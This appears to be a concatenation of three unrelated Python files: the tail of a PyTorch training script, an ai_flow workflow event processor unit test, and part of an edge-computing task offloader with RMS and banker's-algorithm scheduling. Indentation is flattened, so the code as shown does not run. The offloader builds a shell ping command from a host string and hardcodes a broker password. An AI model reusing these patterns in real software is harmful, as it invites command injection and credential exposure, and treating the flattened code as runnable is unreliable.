total = 0.
valid_correct = 0.
total_loss = 0.
model.eval()
random_mod=np.random.randint(10)+1
if full and write:
if path.isfile(prediction_file):
print("Found prediction file present. Removing :",prediction_file)
os.remove(prediction_file)
f = open(prediction_file, "ab")
print("full operation: writing predictions to ", prediction_file)
with torch.no_grad():
for batch_id, (x_t, y_t) in enumerate(validation_dataloader):
if batch_id % random_mod==0 or full:
x_t = Variable(x_t).cuda(device_id) if GPU_IN_USE else Variable(x_t)
y_t = Variable(y_t).cuda(device_id) if GPU_IN_USE else Variable(y_t)
y_t = y_t.double()
output = model(x_t)
predicted = output.data > 0.5
y_t = y_t.reshape(output.shape[0], 1)
loss = plain_loss_func(output, y_t)
total_loss += loss
valid_correct += (predicted == y_t.data.bool()).sum().item()
total += y_t.data.shape[0]
count += 1
if full and write:
np.savetxt(f, X=output.cpu().data.numpy()[:,0], fmt="%1.6f")
f.flush()
#print("Loss", total_loss / count)
if count > 50 and (not full):
break
if full and write:
f.close()
valid_accuracy = valid_correct / total
valid_loss = total_loss / count
return valid_accuracy, valid_loss
if __name__ == '__main__':
print("dataset={}; async={}; num_process={} ; MH={}; K={}; L={}; epoch={}; batch_size={}".format(DATASET, ASYNC, PROCESS, MH, K, L, EPOCH, BATCH_SIZE))
#########################################
print("***** prepare model ******")
if L == 0:
model = LRSG(dimension=D).double()
else:
model = FCNSG(dimension=D, num_layers=L,hidden_size=HID).double()
if GPU_IN_USE:
model.cuda(device_id)
# print(torch.cuda.device_count())
print(model)
#########################################
cfix = "D{}_hidden{}_PW{}_BS{}_LR{}_CW{}_WD{}_HF{}".format(D,HID,PAIRWISE,BATCH_SIZE,LRATE,USECLASSWT,WEIGHT_DECAY,HASHFULL)
fix = "_MH_COMP{}_K{}_{}".format(MHCOMPUTATION,K,cfix) if MH else "_FH_{}".format(cfix)
print("RUNCONFIG:", fix)
data_files = ["train.txt", "train_small_ub.txt", "test.txt", "test_small_ub.txt"]
data_dirs = list(map(lambda f: join(cur_dir, DATASET, "data", f), data_files))
print(data_files)
time_file = join(cur_dir, DATASET, "record", "time_record.txt")
if not ASYNC:
record_files = ["acc{}_L{}.txt".format(fix, L), "val_acc{}_L{}.txt".format(fix, L),
"loss{}_L{}.txt".format(fix, L), "val_loss{}_L{}.txt".format(fix, L),
"final_prediction{}_L{}.txt".format(fix, L),
"checkpoint{}_L{}.ckpt".format(fix, L),
"index{}_L{}.txt".format(fix, L)] # TODO final preduction for async
record_dirs = list(map(lambda f: join(cur_dir, DATASET, "record", f), record_files))
train(data_dirs, D, model, MH, time_file, record_dirs)
else:
mp.set_start_method('spawn')
model.share_memory()
processes = []
all_record_dirs = []
for p_id in range(PROCESS):
record_files = ["pid{}_acc{}_L{}.txt".format(p_id, fix, L), "pid{}_val_acc{}_L{}.txt".format(p_id, fix, L),
"pid{}_loss{}_L{}.txt".format(p_id, fix, L), "pid{}_val_loss{}_L{}.txt".format(p_id, fix, L)]
record_dirs = list(map(lambda f: join(cur_dir, DATASET, "record", f), record_files))
all_record_dirs.append(record_dirs)
p = mp.Process(target=train, args=(data_dirs, D, model, MH),
kwargs={"time_file": time_file, "record_files": record_dirs, "p_id": p_id})
p.start()
processes.append(p)
for p in processes:
p.join()
# File combination
acc, valacc, loss, valloss = [], [], [], []
for fnames in all_record_dirs:
acc.append(np.loadtxt(fnames[0]))
valacc.append(np.loadtxt(fnames[1]))
loss.append(np.loadtxt(fnames[2]))
valloss.append(np.loadtxt(fnames[3]))
acc = np.mean(np.array(acc), axis=0).ravel()
valacc = np.mean(np.array(valacc), axis=0).ravel()
loss = np.mean(np.array(loss), axis=0).ravel()
valloss = np.mean(np.array(valloss), axis=0).ravel()
acc_name = join(cur_dir, DATASET, "record", "[ASYNC]acc{}_L{}.txt".format(fix, L))
valacc_name = join(cur_dir, DATASET, "record", "[ASYNC]val_acc{}_L{}.txt".format(fix, L))
loss_name = join(cur_dir, DATASET, "record", "[ASYNC]loss{}_L{}.txt".format(fix, L))
valloss_name = join(cur_dir, DATASET, "record", "[ASYNC]val_loss{}_L{}.txt".format(fix, L))
np.savetxt(acc_name, acc)
np.savetxt(valacc_name, valacc)
np.savetxt(loss_name, loss)
np.savetxt(valloss_name, valloss)
|
test_workflow_event_processor.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import multiprocessing
import unittest
import unittest.mock as mock
from multiprocessing import Queue, Value
import cloudpickle
from ai_flow.workflow.status import Status
from ai_flow.api.context_extractor import ContextExtractor, EventContext, Broadcast, ContextList
from ai_flow.meta.workflow_meta import WorkflowMeta
from ai_flow.scheduler_service.service.workflow_event_handler import WorkflowEventHandler
from ai_flow.scheduler_service.service.workflow_execution_event_handler_state import WorkflowContextEventHandlerState
from ai_flow.workflow.control_edge import WorkflowSchedulingRule, MeetAllEventCondition, WorkflowAction
from notification_service.base_notification import BaseEvent
from ai_flow.plugin_interface.scheduler_interface import Scheduler, WorkflowExecutionInfo
from ai_flow.store.abstract_store import AbstractStore
from ai_flow.scheduler_service.service.workflow_event_processor import WorkflowEventProcessor, Poison
class MyContextExtractor(ContextExtractor):
def extract_context(self, event: BaseEvent) -> EventContext:
if event.event_type == 'exception':
raise Exception()
if event.event_type == 'broadcast':
return Broadcast()
context_list = ContextList()
context_list.add_context(event.context)
return context_list
class TestWorkflowEventProcessor(unittest.TestCase):
def setUp(self) -> None:
self.mock_store: AbstractStore = mock.Mock()
self.mock_scheduler: Scheduler = mock.Mock()
self.mock_event_handler: WorkflowEventHandler = mock.Mock()
def mock_event_handler_factory(scheduler_rule):
return self.mock_event_handler
self.c1, self.c2 = multiprocessing.connection.Pipe()
self.processor = WorkflowEventProcessor(self.c1, self.mock_store, self.mock_scheduler,
workflow_event_handler_factory=mock_event_handler_factory)
self._prepare_workflows()
def test_run_and_stop(self):
import time
self.call_cnt = Value('i', 0)
def mock__process_event(*args, **kwargs):
self.call_cnt.value += 1
self.processor._process_event = mock__process_event
process = multiprocessing.Process(target=self.processor.run)
process.start()
event = BaseEvent('k', 'v', namespace='test_namespace')
self.c2.send(event)
time.sleep(1)
self.assertEqual(1, self.call_cnt.value)
self.c2.send(Poison())
process.join()
def test__process_event(self):
self.call_cnt = 0
def mock__handle_event_for_workflow(*args, **kwargs):
self.call_cnt += 1
self.processor._handle_event_for_workflow = mock__handle_event_for_workflow
self.processor._process_event(BaseEvent('k', 'v', namespace='test_namespace'))
self.assertEqual(3, self.call_cnt)
def _prepare_workflows(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.STOP)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
rule2 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k2', 'v2', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
w2 = WorkflowMeta('workflow2', 1, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule2])
w3 = WorkflowMeta('workflow3', 1, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule])
def mock_list_workflows(project_name):
if project_name == 'test_project1':
return [w1]
elif project_name == 'test_project2':
return [w2, w3]
else:
return None
self.mock_store.list_workflows = mock_list_workflows
self.mock_store.list_project.return_value = ['test_project1', 'test_project2']
def test__get_subscribed_workflow(self):
e = BaseEvent('k1', 'v1', namespace='test_namespace')
workflows = self.processor._get_subscribed_workflow(e, 'test_project1')
self.assertEqual(1, len(workflows))
self.assertEqual('workflow1', workflows[0].name)
e = BaseEvent('k2', 'v2', namespace='test_namespace')
workflows = self.processor._get_subscribed_workflow(e, 'test_project2')
self.assertEqual(1, len(workflows))
self.assertEqual('workflow2', workflows[0].name)
e = BaseEvent('k', 'v', namespace='test_namespace')
workflows1 = self.processor._get_subscribed_workflow(e, 'test_project1')
workflows2 = self.processor._get_subscribed_workflow(e, 'test_project2')
self.assertEqual(3, len(workflows1 + workflows2))
self.assertIn('workflow1', [workflow.name for workflow in workflows1])
self.assertIn('workflow2', [workflow.name for workflow in workflows2])
self.assertIn('workflow3', [workflow.name for workflow in workflows2])
def test__get_subscribed_workflow_without_workflow(self):
e = BaseEvent('k2', 'v2', namespace='test_namespace')
workflows = self.processor._get_subscribed_workflow(e, 'test_not_exist_project')
self.assertEqual(0, len(workflows))
def test__get_workflow_execution_state_register_state_if_not_exist(self):
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.get_workflow_context_event_handler_state.return_value = None
self.mock_store.register_workflow_context_event_handler_state.return_value = state
context_list = ContextList()
context_list.add_context('context_1')
states = self.processor._get_workflow_execution_state(context_list, 'project', 'workflow1')
self.assertEqual(1, len(states))
self.assertEqual(state, states[0])
self.mock_store.register_workflow_context_event_handler_state.assert_called_with('project', 'workflow1',
'context_1')
def test__get_workflow_execution_state_with_context(self):
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
context_list = ContextList()
context_list.add_context('context_1')
context_list.add_context('context_2')
states = self.processor._get_workflow_execution_state(context_list, 'project', 'workflow1')
calls = [mock.call('project', 'workflow1', 'context_1'), mock.call('project', 'workflow1', 'context_2')]
self.mock_store.get_workflow_context_event_handler_state.assert_has_calls(calls, any_order=True)
self.assertEqual(2, len(states))
def test__get_workflow_execution_state_with_broadcast(self):
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.list_workflow_context_event_handler_states.return_value = [state]
states = self.processor._get_workflow_execution_state(Broadcast(), 'project', 'workflow1')
self.mock_store.list_workflow_context_event_handler_states.assert_called_with('project', 'workflow1')
self.assertEqual(1, len(states))
self.assertEqual(state, states[0])
def test__handler_event_for_workflow_none_action(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.START)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
self.mock_event_handler.handle_event.return_value = (WorkflowAction.NONE, 1)
e = BaseEvent('k1', 'v1', namespace='test_namespace')
self.processor._handle_event_for_workflow('project', w1, e)
self.mock_store.update_workflow_context_event_handler_state \
.assert_called_with('project', 'workflow1', 'context_1', None, 1)
def test__handler_event_for_workflow_start_action(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.START)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
# Start Action
self.mock_scheduler.start_new_workflow_execution.return_value = WorkflowExecutionInfo('execution_id')
self.mock_event_handler.handle_event.return_value = (WorkflowAction.START, 1)
e = BaseEvent('k1', 'v1', namespace='test_namespace')
self.processor._handle_event_for_workflow('project', w1, e)
self.mock_scheduler.start_new_workflow_execution.assert_called_with('project', 'workflow1', 'context_1')
self.mock_store.update_workflow_context_event_handler_state \
.assert_called_with('project', 'workflow1', 'context_1', 'execution_id', 1)
def test__handler_event_for_workflow_start_with_running_workflow_execution(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.START)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1', '1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
# Start Action
self.mock_scheduler.get_workflow_execution.return_value = WorkflowExecutionInfo('1', status=Status.RUNNING)
self.mock_event_handler.handle_event.return_value = (WorkflowAction.START, 1)
e = BaseEvent('k1', 'v1', namespace='test_namespace')
self.processor._handle_event_for_workflow('project', w1, e)
self.mock_scheduler.start_new_workflow_execution.assert_not_called()
self.mock_store.update_workflow_context_event_handler_state \
.assert_called_with('project', 'workflow1', 'context_1', '1', 1)
def test__handler_event_for_workflow_start_with_non_running_workflow_execution(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.START)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1', '1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
# Start Action
self.mock_scheduler.get_workflow_execution.return_value = WorkflowExecutionInfo('1', status=Status.FINISHED)
self.mock_scheduler.start_new_workflow_execution.return_value = WorkflowExecutionInfo('execution_id')
self.mock_event_handler.handle_event.return_value = (WorkflowAction.START, 1)
e = BaseEvent('k1', 'v1', namespace='test_namespace')
self.processor._handle_event_for_workflow('project', w1, e)
self.mock_scheduler.start_new_workflow_execution.assert_called_with('project', 'workflow1', 'context_1')
self.mock_store.update_workflow_context_event_handler_state \
.assert_called_with('project', 'workflow1', 'context_1', 'execution_id', 1)
def test__handler_event_for_workflow_stop_action(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.START)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
self.mock_event_handler.handle_event.return_value = (WorkflowAction.STOP, 1)
e = BaseEvent('k1', 'v1', namespace='test_namespace')
self.processor._handle_event_for_workflow('project', w1, e)
self.mock_store.update_workflow_context_event_handler_state \
.assert_called_with('project', 'workflow1', 'context_1', None, 1)
state.workflow_execution_id = 'execution_id'
self.processor._handle_event_for_workflow('project', w1, e)
self.mock_scheduler.stop_workflow_execution.assert_called_with('execution_id')
self.mock_store.update_workflow_context_event_handler_state \
.assert_called_with('project', 'workflow1', 'context_1', 'execution_id', 1)
def test__handler_event_for_workflow_exception(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.START)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
# Start Action
e = BaseEvent('k1', 'v1', namespace='test_namespace', event_type='exception')
self.processor._handle_event_for_workflow('project', w1, e)
|
algo_one.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
import argparse
import pickle
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
outward_mec = 0 # keeps count of tasks sent back to another mec after executing
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}]  # [[task_list], {wait_time}] => records tasks re-offloaded to this MEC for execution.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
shared_resource_lock = threading.Lock()
t_track = 1
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
try:
_time_.append(g[1])
except IndexError:
_time_.append('0')
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
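# Illustrative sketch (commented out, not part of the control flow): the RMS
# hyperperiod is the LCM of the task periods, which is what load_tasks() below
# computes. For the _tasks defined above (periods 20, 5, 10, 10, 15):
# >>> lcm([_tasks[t]['period'] for t in _tasks])
# 60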
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id, )
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
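# Illustrative sketch with hypothetical values (commented out): task_time_map
# collapses a preemption-expanded RMS timeline back into one entry per unit of
# WCET, preserving the order in which each task first gets the CPU.
# >>> task_time_map(seq=['t2', 't1', 't2', 't1', 't1'],
# ...               process={'t1': {'wcet': 3}, 't2': {'wcet': 1}})
# ['t2', 't1', 't1', 't1']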
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
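# Illustrative usage sketch (commented out; assumes the globals `tasks` and
# `t_time` have already been populated from a received task set, as happens in
# start_loop() below): build the hyperperiod and the idle-padded task set, then
# run the RMS scheduler over it to obtain the execution order.
# >>> lcm_result, task_load = load_tasks()
# >>> rms_sequence = scheduler(lcm_result, task_load)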
# generate execution sequence
def is_safe(processes, avail, _need_, allot, p): # bankers algorithm
need = [_need_[i] for i in _need_]
_allot_ = [allot[i] for i in allot]
# tasks to offload if exit
offload = []
# Number of resources
res = 3
# Mark all processes as unfinished
finish = [0] * p
# To store safe sequence
safe_seq = [0] * p
# Make a copy of available resources
work = [0] * res
for i in range(res):
work[i] = avail[i]
# While all processes are not finished
# or system is not in safe state.
count = 0
while count < p:
# Find a process which is not finish
# and whose needs can be satisfied
# with current work[] resources.
found = False
for t in range(p):
# First check if a process is finished,
# if no, go for next condition
if finish[t] == 0:
# Check if for all resources
# of current P need is less
# than work
for j in range(res):
if need[t][j] > work[j]:
break
# If all needs of p were satisfied.
if j == res - 1:
# Add the allocated resources of
# current P to the available/work
# resources i.e.free the resources
for k in range(res):
work[k] += _allot_[t][k]
# Add this process to safe sequence.
safe_seq[count] = processes[t]
count += 1
# Mark this p as finished
finish[t] = 1
found = True
# If we could not find a next process
# in safe sequence.
if not found:
print("System is not in safe state")
a = list(set(processes) - set(safe_seq) - set(offload))
_max = np.array([0, 0, 0])
n = {}
for i in a:
n[i] = sum(allocation[i[:2]])
_max = max(n, key=n.get)
print('work: ', work, 'need: ', _need[_max[:2]])
offload.append(_max)
work = np.array(work) + np.array(allocation[_max[:2]])
count += 1
# Mark this p as finished
finish[processes.index(_max)] = 1
found = True
# If system is in safe state then
# safe sequence will be as below
if len(offload) > 0:
safe_seq = safe_seq[:safe_seq.index(0)]
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print("System is in safe state.",
"\nSafe sequence is: ", end=" ")
print('safe seq: ', safe_seq)
return safe_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return is_safe(processes, avail, n_need, allot, p)
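# Illustrative sketch with hypothetical task ids (commented out): get_exec_seq()
# runs the banker's algorithm over the RMS output. Each task name is truncated
# to its first two characters (e.g. 't1') to look up _need/allocation, and any
# task that cannot be granted resources safely is handed to cooperative_mec()
# for offloading, so calling this touches the network when offloading occurs.
# >>> safe_sequence = get_exec_seq(['t1', 't2', 't5'])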
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# broadcast waiting time = total waiting time / 2 (the full waiting time might be too tight)
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
timed_out_tasks = 0
def compare_local_mec(list_seq):
global received_time, timed_out_tasks
execute_mec = []
execute_locally = []
diff = time.time() - received_time.pop(0)
checking_times = {}
for i in list_seq:
t_time[i.split('_')[0]][1] -= diff
# if t_time[i.split('_')[0]][1] < 0:
# _client.publish(i.split('_')[0].split('.')[2], str({i.split('_')[0]: get_time() + ['local']}), )
# timed_out_tasks += 1
if t_time[i.split('_')[0]][1] > list_seq[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
checking_times[i] = {'Latency': t_time[i.split('_')[0]][1], 'Expected_exec_time': list_seq[i]}
print('Execution time comparison:= ', checking_times)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
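# Illustrative sketch of the recurrence above with hypothetical numbers: if two
# waiting-time samples have already been folded into a running average of 4.0
# (stored as the last element of mec_waiting_time[ma1]), a new sample of 7.0
# yields ((3 - 1) * 4.0 + 7.0) / 3 = 5.0.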
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
# print('received: ', hosts)
